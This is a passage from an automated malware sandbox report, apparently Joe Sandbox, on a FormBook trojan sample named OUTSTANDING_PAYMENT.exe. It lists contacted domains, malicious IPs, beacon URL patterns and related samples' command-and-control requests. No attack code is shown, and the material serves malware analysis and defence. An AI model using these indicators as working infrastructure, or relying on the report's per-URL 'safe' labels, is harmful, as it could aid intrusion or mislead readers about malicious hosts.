                                                                  http://www.brennmansoluciones.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.nic.ru/catalog/mail/on-domain/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.karlscurry.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.nic.ru/product/mail/forward/?ipartner=6666&adv_id=click_mail_forward&utm_source=stpg_allrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&urundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.thelastwill.netexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.nic.ru/catalog/domains/rf/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.thebang.sbsexplorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.nic.ru/auction/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sexopornoxx.store/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://www.ty23vip.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=81EFaKSJ3.13.drfalse
                                                                              		high
                                                                              https://www.nic.ru/catalog/hosting/dedicated/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_arundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://nsis.sf.net/NSIS_ErrorErrorOUTSTANDING_PAYMENT.exefalse
                                                                                    		high
                                                                                    https://www.nic.ru/catalog/domains/com/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://tiao2022.vip:12306/?u=rundll32.exe, 0000000D.00000002.781120791.000000000645C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                          		high
                                                                                          http://www.gorwly.topexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://www.mynichemarket.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.themssterofssuepnse.restexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://www.fanversewallet.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://www.nic.ru/opensearch.xmlrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://storage.nic.ru/ru/images/png/1.rc-logo-og.pngrundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.leewanyam.com/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.allison2patrick.onlineexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.brennmansoluciones.com/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.brennmansoluciones.com/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://search.yahoo.com?fr=crmas_sfpfrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                		high
                                                                                                https://www.fasthosts.co.uk/domain-names/search/?domain=$rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.themssterofssuepnse.rest/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://www.leewanyam.com/0oqq/explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://fasthosts.co.uk/rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.ketoibabal.cyouexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.nic.ru/catalog/hosting/shared/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_rundll32.exe, 0000000D.00000002.781120791.0000000005AF0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://www.nic.ru/catarundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.nic.ru/catalog/hosting/shared/?ipartner=6666&adv_id=click_vh&utm_source=stpg_all&utm_medrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.landlotto.ruexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icorundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                        		high
                                                                                                        https://www.nic.ru?ipartner=6666&adv_id=logo&utm_source=stpg_all&utm_medium=link&utm_campaign=logorundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.virginhairweave.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.litespeedtech.com/error-pagerundll32.exe, 0000000D.00000002.781120791.000000000595E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchrundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                              		high
                                                                                                              https://www.nic.ru/catalog/hosting/cms/?ipartner=6666&adv_id=click_cmsh&utm_source=stpg_all&utm_medirundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://ac.ecosia.org/autocomplete?q=81EFaKSJ3.13.drfalse
                                                                                                                  		high
                                                                                                                  https://search.yahoo.com?fr=crmas_sfprundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.drfalse
                                                                                                                    		high
                                                                                                                    https://www.nic.ru/catalog/hosting/vds-vps/rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.g2fm.co.ukexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      109.70.26.37
                                                                                                                      		www.landlotto.ruRussian Federation
                                                                                                                      		48287RU-CENTERRUtrue
                                                                                                                      88.99.217.197
                                                                                                                      		glb-mobility.comGermany
                                                                                                                      		24940HETZNER-ASDEtrue
                                                                                                                      217.160.0.249
                                                                                                                      		www.karlscurry.co.ukGermany
                                                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                      162.209.159.142
                                                                                                                      		www.ty23vip.comUnited States
                                                                                                                      		40065CNSERVERSUStrue
                                                                                                                      192.64.116.162
                                                                                                                      		www.gorwly.topUnited States
                                                                                                                      		22612NAMECHEAP-NETUStrue
                                                                                                                      199.59.243.223
                                                                                                                      		www.hudsonandbailey.ukUnited States
                                                                                                                      		395082BODIS-NJUStrue
                                                                                                                      5.181.216.141
                                                                                                                      		dirdikyepedia.comGermany
                                                                                                                      		59637ASRSINETRUtrue
                                                                                                                      62.4.21.190
                                                                                                                      		allison2patrick.onlineFrance
                                                                                                                      		12876OnlineSASFRtrue
                                                                                                                      185.151.30.181
                                                                                                                      		www.mynichemarket.co.ukUnited Kingdom
                                                                                                                      		48254TWENTYIGBtrue
                                                                                                                      203.245.24.47
                                                                                                                      		fanversewallet.comKorea Republic of
                                                                                                                      		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                      198.58.118.167
                                                                                                                      		www.virginhairweave.co.ukUnited States
                                                                                                                      		63949LINODE-APLinodeLLCUStrue
                                                                                                                      213.171.195.105
                                                                                                                      		www.g2fm.co.ukUnited Kingdom
                                                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                                      General Information

                                                                                                                      Joe Sandbox Version:37.0.0 Beryl
                                                                                                                      Analysis ID:830322
                                                                                                                      Start date and time:2023-03-20 09:06:45 +01:00
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 13m 10s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Number of analysed new started processes analysed:18
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample file name:OUTSTANDING_PAYMENT.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@26/12
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 33.6% (good quality ratio 32.5%)
                                                                                                                      • Quality average: 81%
                                                                                                                      • Quality standard deviation: 24.3%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 82
                                                                                                                      • Number of non-executed functions: 60
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240s for rundll32

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      09:07:58API Interceptor1873x Sleep call for process: explorer.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      109.70.26.37031002200411_85416475.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • www.landlotto.ru/8bfi/?zWlew1c=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&OgJSC=ZGqA1YcB
                                                                                                                      DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.landlotto.ru/0oqq/?Ruu6XZ=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7/rH4CMublm7Haah6y5P+nmPrL&2bZBp4=SbhpRad-bNU
                                                                                                                      Payment advise.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.commandos-g.com/s44m/?JXr6I=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCAzLm0G93xdpHA==&Wu5p=T5ASsiZg7veLY
                                                                                                                      Receipt.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.landlotto.ru/0oqq/?yUZlwOT5=zVtcFUb2erpe1riHMkA+/+PLDdvnZOilBrPOkTLBlxKebXbCPRW4F7hHIT/4WhPpl+5XC4kkcR4ywvq/sd7/lmwCNrvm2YvKeA==&WwsB=qH_5y
                                                                                                                      HSBC Payment Advice _pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.commandos-g.com/s44m/?Ud=0Xrb9TeaJ6QMFzil1wJub0qcCdbijbT0/wHKDC0TYNA+ECGM5nziUQ10KwMvt1kD3WoO5wOCVaMWu5wQhMioCBrWrTq9lBVhHA==&JT=n5Pj6Rg4D3GGw
                                                                                                                      Invoice_78682.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • www.landlotto.ru/8bfi/?iys=A2R81uzLvS0WmEZs04/BP8N0Gjc/1cZcLvuM3RKwCSd5NfyML6VBFcfDSbjtAw22etViIiX2xpSo0klfeHLPYGaSbH+bfsHC3w==&jYo2=kvmTysEL4S
                                                                                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.avista-dmd.ru/m62e/?i8OtN=YGVozvfYsjE0w63NNke5ck5mOKxmM1UkCwvgxjtFvjRlREl+kejcfl6B7N11H0qTbRUX&3ftP=1bsL
                                                                                                                      order confirmation is attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • www.xn--d1acnfnmta.xn--p1ai/pn4e/?Ol53s=Ekys-3XKwc0kEr&0hNpF=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==
                                                                                                                      Nonsanctity.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • www.landlotto.ru/gds6/?MzRO6=p-kkXaTl&yazG5b=j0UyBVZgypywE5dbw4eerW/5MfJ0zjNWa6fP9PCay/vxzLUUL7NaZ5YDHETjW44gF4/e34XXNfSUXD71sQ9fzsGiutrRq9ZZTg==
                                                                                                                      YRO4s1O9ic.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?b0D81F=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktV7bRnswekKqZA==&9r=7nztZ810mlS8aR
                                                                                                                      7015892.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?3f=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8snm07ab1FNJ2+bIA==&Wfst=LfVPLjqxg
                                                                                                                      SOA 5139076.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?Dxl0i0m=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktV7bRnswekKqZA==&bFND=g0GHQ8qxK4XDY
                                                                                                                      SKM_C33501911071.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?3f=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8snh3PWRk1NZWnafmGr6WZtVdwF&b65X=4hiXs2
                                                                                                                      61805394.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?4h_T8=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktV7bRnswekKqZA==&s2MTIl=7njDJFwpRL
                                                                                                                      Quotation 2101137.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?b4qTj=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktV7bRnswekKqZA==&tRqx=fDK4_ZopbB0pTBO
                                                                                                                      Quotation 2101137.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?CtxtX=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktV7bRnswekKqZA==&q48=g4g8W2L08t2l5vfp
                                                                                                                      71084394.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?7nfpvl1X=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktUjKeAwwdkCiZA==&f6Ah=WHQHW
                                                                                                                      Purchase order 781830171.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?j6AXV8=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktUjKeAwwdkCiZA==&8p3t=ZTVp3ld
                                                                                                                      713290575.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?-ZUdV8=l8htajcGvbTZwYtvrMRgXQql+wYnhXJvc8DaCsLB2qW4JBYxjsR1SRNZ9kuL7voRGmeRv/Anf4F3ldRXO8sntV/WQkVaekOHIw==&lBbHu=-Zuxi8lhNtttlp
                                                                                                                      Quotation 911799 - EM092722.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.relays.info/yurm/?6l6L3=l8htajcGvbTZwYtvq5oqZw2dogkX1GJvc8DaCsLB2qW4JBYxjsR1SRBZ9kuL7voRGmeRv/Anf4F3ldRXO8sktUjKeAwwdkCiZA==&RDHpuj=y8hDQBzxK0o4

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      RU-CENTERRUsetup.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoader, VidarBrowse
                                                                                                                      • 195.24.68.17
                                                                                                                      setup.exeGet hashmaliciousAmadey, Djvu, RHADAMANTHYS, SmokeLoader, VidarBrowse
                                                                                                                      • 195.24.68.17
                                                                                                                      8ExXjPtCS8.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 91.189.114.30
                                                                                                                      CRD_NT_INV-2306020237.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      X6yu1q9YBY.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 195.24.68.5
                                                                                                                      RUS3109Y51.exeGet hashmaliciousAveMaria, FormBook, UACMeBrowse
                                                                                                                      • 195.24.68.5
                                                                                                                      PURCHASE_ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 91.189.114.29
                                                                                                                      PUCHASE_INQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 91.189.114.29
                                                                                                                      iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                                                                                                                      • 31.177.80.70
                                                                                                                      031002200411_85416475.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 109.70.26.37
                                                                                                                      DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 109.70.26.37
                                                                                                                      (70)DECOSERVEIS_fact._num.2023.70_FyA.pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      rORDERINQUIRY_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 91.189.114.29
                                                                                                                      http://biver.abc64.ru/out.php?link=https://blockattacks-odx4p.pagemaker.link/blockattacks?draftGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 195.24.68.29
                                                                                                                      JUSTIFICANTE_DE_TRANSFERENCIAPDF.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 194.85.61.76
                                                                                                                      20230306-1000_OFERTA_0000015436812_002323pdf.vbsGet hashmaliciousFormBookBrowse
